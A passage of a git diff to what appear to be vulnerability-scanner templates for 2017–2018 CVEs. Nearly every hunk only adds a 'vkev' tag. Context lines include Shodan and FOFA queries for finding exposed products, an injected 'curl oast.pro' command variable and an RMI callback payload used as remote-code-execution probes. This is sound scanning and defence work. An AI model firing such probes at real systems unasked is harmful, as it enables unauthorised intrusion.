b/http/cves/2017/CVE-2017-1000486.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: primetek product: primefaces - tags: cve2017,cve,primetek,rce,injection,kev + tags: cve2017,cve,primetek,rce,injection,kev,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 1226f00ab6d..d3ee1718464 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle + tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 9bd2a368503..177a9d0e459 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: yaws product: yaws - tags: cve,cve2017,edb,yaws,lfi + tags: cve,cve2017,edb,yaws,lfi,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 79dbd16c660..b48c07bd01a 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -34,7 +34,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2017,manageengine,lfr,unauth,tenable + tags: cve,cve2017,manageengine,lfr,unauth,tenable,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 70b890455e6..e565255c7ed 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -32,7 +32,7 @@ info: - http.title:"supervisor status" fofa-query: title="supervisor status" google-query: intitle:"supervisor status" - tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord + tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 6943a6db89c..2091d78146a 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" fofa-query: title="jboss" google-query: intitle:"jboss" - tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat + tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index daa759b620e..79b5077ca55 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: integrated_lights-out_4_firmware - tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp + tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 93dcca3e2b9..ccaad1a4529 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2017,apache,rce,struts + tags: cve,cve2017,apache,rce,struts,vkev http: - method: POST diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 899669b2566..a7fdc1bbbee 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -37,7 +37,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive + tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive,vkev http: - method: PUT diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 7ded7f40655..60d34ab7cfa 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -38,7 +38,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2017,cve,tomcat,apache,rce,kev,intrusive + tags: cve2017,cve,tomcat,apache,rce,kev,intrusive,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index f1d9d6c7ebe..f1a74604cc8 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -30,7 +30,7 @@ info: shodan-query: - product:"couchdb" - cpe:"cpe:2.3:a:apache:couchdb" - tags: cve2017,cve,couchdb,apache,intrusive + tags: cve2017,cve,couchdb,apache,intrusive,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 679274c2975..d02d7cf41f3 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -29,7 +29,7 @@ info: product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve2017,cve,sap,lfi,java,traversal,kev + tags: cve2017,cve,sap,lfi,java,traversal,kev,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index dfc908886ae..d558d570141 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -32,7 +32,7 @@ info: - http.title:"dreambox webcontrol" fofa-query: title="dreambox webcontrol" google-query: intitle:"dreambox webcontrol" - tags: cve,cve2017,dreambox,rce,oast,edb + tags: cve,cve2017,dreambox,rce,oast,edb,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index e1442d29c1d..95751c99003 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -28,7 +28,7 @@ info: vendor: luracast product: restler framework: typo3 - tags: cve,cve2017,restler,lfi,edb,luracast,typo3 + tags: cve,cve2017,restler,lfi,edb,luracast,typo3,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index da6fa37d2f3..7f5e58a80ce 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -30,7 +30,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive + tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index da9724980dd..bfa25a13110 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -30,7 +30,7 @@ info: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks + tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index ea35eeb2715..304f943a8a8 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -36,7 +36,7 @@ info: fofa-query: - app="Laravel-Framework" - app="laravel-framework" - tags: cve,cve2017,laravel,exposure,packetstorm + tags: cve,cve2017,laravel,exposure,packetstorm,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 0885fff5d3a..c88e43c9af9 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -29,7 +29,7 @@ info: vendor: embedthis product: goahead shodan-query: cpe:"cpe:2.3:a:embedthis:goahead" - tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 2737adf1235..364f38a0c87 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -36,7 +36,7 @@ info: - app="DedeCMS" - app="dedecms" - body="dedecms" - tags: cve,cve2017,sqli,dedecms + tags: cve,cve2017,sqli,dedecms,vkev variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-18349.yaml b/http/cves/2017/CVE-2017-18349.yaml index 6e9f1e4d639..9c8ac3f741e 100644 --- a/http/cves/2017/CVE-2017-18349.yaml +++ b/http/cves/2017/CVE-2017-18349.yaml @@ -29,7 +29,7 @@ info: verified: true vendor: alibaba product: fastjson - tags: cve,cve2017,fastjson,deserialization,rce,oob,oast + tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev variables: rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}" diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 5b9fb4beebc..e32acd29c20 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -31,7 +31,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle,kev + tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle,kev,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 0a714ee43d0..91643603bd1 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: netgear product: r6200_firmware - tags: cve,cve2017,auth-bypass,netgear,router,kev + tags: cve,cve2017,auth-bypass,netgear,router,kev,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 1a7db682bed..9fb2021c21d 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -39,7 +39,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2017,cve,apache,kev,msf,struts,rce + tags: cve2017,cve,apache,kev,msf,struts,rce,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 97260accc68..3e580a4af43 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -33,7 +33,7 @@ info: - http.title:"active management technology" fofa-query: title="active management technology" google-query: intitle:"active management technology" - tags: cve2017,cve,amt,intel,tenable,kev + tags: cve2017,cve,amt,intel,tenable,kev,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 60d50742420..d98774195d3 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -32,7 +32,7 @@ info: - http.title:"phpcollab" fofa-query: title="phpcollab" google-query: intitle:"phpcollab" - tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive + tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev variables: string: "CVE-2017-6090" diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index ab0fb032283..9c91ee7f6a1 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -29,7 +29,7 @@ info: vendor: microsoft product: internet_information_server shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" - tags: cve2017,cve,rce,windows,iis,kev,microsoft + tags: cve2017,cve,rce,windows,iis,kev,microsoft,vkev http: - method: OPTIONS diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index c91dd4b7989..a7219e738c4 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -28,7 +28,7 @@ info: vendor: magmi_project product: magmi shodan-query: http.component:"magento" - tags: cve2017,cve,magmi,xss,magmi_project + tags: cve2017,cve,magmi,xss,magmi_project,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index e0d5b5ca6d5..92dd486cc01 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: hikvision product: ds-2cd2032-i_firmware - tags: cve,cve2017,auth-bypass,hikvision + tags: cve,cve2017,auth-bypass,hikvision,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-8046.yaml b/http/cves/2017/CVE-2017-8046.yaml index 3e4ec6188d5..0e6e528ffdb 100644 --- a/http/cves/2017/CVE-2017-8046.yaml +++ b/http/cves/2017/CVE-2017-8046.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"eureka" fofa-query: title="eureka" google-query: intitle:"eureka" - tags: cve,cve2017,pivotal,springboot,pivotal_software + tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev flow: | http(1) set("endpoint", iterate(template.endpoint)[0]) diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 372e2d0cb9f..6fdb13ff01b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2017,atlassian,jira,ssrf,oast + tags: cve,cve2017,atlassian,jira,ssrf,oast,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 54b8bcc6c4d..1b1b9f690af 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -40,7 +40,7 @@ info: - body="apache struts" - body="struts problem report" google-query: intitle:"struts2 showcase" - tags: cve2017,cve,apache,rce,struts,kev + tags: cve2017,cve,apache,rce,struts,kev,vkev variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 438473cf4b7..1e46a725dc1 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2017,apache,rce,struts,kev + tags: cve,cve2017,apache,rce,struts,kev,vkev http: - method: POST diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 84ce107e214..5a63298a748 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -28,7 +28,7 @@ info: vendor: dnnsoftware product: dotnetnuke fofa-query: app="dotnetnuke" - tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware + tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware,vkev http: - raw: diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 62aaf7df799..2616cbe2b13 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: boa product: boa - tags: cve,cve2017,boa,lfr,lfi,edb + tags: cve,cve2017,boa,lfr,lfi,edb,vkev http: - method: GET diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 338d719d0d8..57158a202da 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -25,7 +25,7 @@ info: max-request: 6 vendor: phpunit_project product: phpunit - tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project + tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project,vkev variables: string: "CVE-2017-9841" diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 80449334aed..6c5ff9fe0b3 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: rv132w_firmware - tags: cve,cve2018,cisco,router + tags: cve,cve2018,cisco,router,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index a7673904181..d40913d64fe 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: adaptive_security_appliance_software - tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev + tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 4214cd99707..5a595a4ef74 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: jolokia product: webarchive_agent - tags: cve2018,cve,jolokia,rce,jndi,proxy + tags: cve2018,cve,jolokia,rce,jndi,proxy,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index cfad4b82fec..55c4f3d601e 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -29,7 +29,7 @@ info: vendor: jenkins product: github framework: jenkins - tags: cve,cve2018,jenkins,ssrf,oast,github + tags: cve,cve2018,jenkins,ssrf,oast,github,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 95558e929a1..6fa18eb8d78 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:jenkins:jenkins" - product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins + tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 37b1bf217c4..0d16a3fc1cf 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dasannetworks product: gpon_router_firmware - tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks + tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index fc7ad5c856e..b3810214bfa 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -28,7 +28,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2018,nagios,sqli + tags: cve,cve2018,nagios,sqli,vkev variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 5f379254e13..973603802df 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dwr-116_firmware - tags: cve,cve2018,rce,iot,dlink,router,edb,seclists + tags: cve,cve2018,rce,iot,dlink,router,edb,seclists,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 51d121a7af8..9405508caff 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -23,7 +23,7 @@ info: vendor: attribute_wizard_project product: attribute_wizard framework: prestashop - tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project + tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project,vkev variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-11222.yaml b/http/cves/2018/CVE-2018-11222.yaml index 2b5c4a92d5b..d8057bb7d68 100644 --- a/http/cves/2018/CVE-2018-11222.yaml +++ b/http/cves/2018/CVE-2018-11222.yaml @@ -30,7 +30,7 @@ info: - body="pandora fms - installation wizard" - title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive + tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive,vkev variables: marker: "{{randstr}}" diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 4ef7729e90b..de4449fc306 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"login - splunk" fofa-query: title="login - splunk" google-query: intitle:"login - splunk" - tags: cve,cve2018,edb,splunk + tags: cve,cve2018,edb,splunk,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-11686.yaml b/http/cves/2018/CVE-2018-11686.yaml index c5f1cc3f4e6..5cd56ad97d6 100644 --- a/http/cves/2018/CVE-2018-11686.yaml +++ b/http/cves/2018/CVE-2018-11686.yaml @@ -23,7 +23,7 @@ info: product: flowpaper shodan-query: title:"FlexPaper" fofa-query: title="FlexPaper" - tags: cve,cve2018,flexpaper,flowpaper,rce + tags: cve,cve2018,flexpaper,flowpaper,rce,vkev variables: cmd: "curl oast.pro" diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 52b0648a770..ff93c30dc6b 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -33,7 +33,7 @@ info: - http.title:"apache tomcat" fofa-query: title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2018,cve,apache,tomcat,httpd,mod-jk + tags: cve2018,cve,apache,tomcat,httpd,mod-jk,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 32c0998d0e5..aac4072e387 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -37,7 +37,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2018,packetstorm,apache,rce,struts,kev + tags: cve,cve2018,packetstorm,apache,rce,struts,kev,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index ae92010aa29..5f7bcd60299 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: eaton product: intelligent_power_manager - tags: cve,cve2018,edb,lfi,eaton + tags: cve,cve2018,edb,lfi,eaton,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 8e049065430..aef8cb0b789 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: dell product: emc_idrac7 - tags: cve2018,cve,dell,injection,rce + tags: cve2018,cve,dell,injection,rce,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index e283924ab84..609203202c7 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"seagate nas - seagate" fofa-query: title="seagate nas - seagate" google-query: intitle:"seagate nas - seagate" - tags: cve,cve2018,seagate,nasos,disclosure,unauth + tags: cve,cve2018,seagate,nasos,disclosure,unauth,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 8e87cd849f5..ffb130b0a0c 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -36,7 +36,7 @@ info: - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi + tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 08856d38e19..560eb1e1cd9 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -33,7 +33,7 @@ info: max-request: 2 vendor: pivotal_software product: spring_data_commons - tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software + tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software,vkev http: - raw: diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 3f2a05951dd..93002567e22 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zohocorp product: firewall_analyzer - tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp + tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 9ddf055606c..853b78aff78 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: apache product: tika - tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive + tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive,vkev http: - method: PUT diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 17b54a40ec7..0cd818ff954 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve2018,cve,fortios,lfi,kev,fortinet + tags: cve2018,cve,fortios,lfi,kev,fortinet,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index e3fc1e200ad..777cfb887d9 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"git repository browser" fofa-query: title="git repository browser" google-query: intitle:"git repository browser" - tags: cve,cve2018,cgit,lfi,cgit_project + tags: cve,cve2018,cgit,lfi,cgit_project,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index a72b3607cc8..7d433784b14 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -33,7 +33,7 @@ info: - http.html:"LGATE-902" - http.html:"lgate-902" fofa-query: body="lgate-902" - tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss + tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-14933.yaml b/http/cves/2018/CVE-2018-14933.yaml index 619ae4fb38b..2a877e7ea4f 100644 --- a/http/cves/2018/CVE-2018-14933.yaml +++ b/http/cves/2018/CVE-2018-14933.yaml @@ -24,7 +24,7 @@ info: product: nvrmini_firmware shodan-query: title:"NUUO" fofa-query: title="NUUO" - tags: cve,cve2018,nuuo,rce,kev + tags: cve,cve2018,nuuo,rce,kev,vkev http: - method: GET diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index f17570b3e1d..2ed4482da52 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: ericssonlg product: ipecs_nms - tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg + tags: 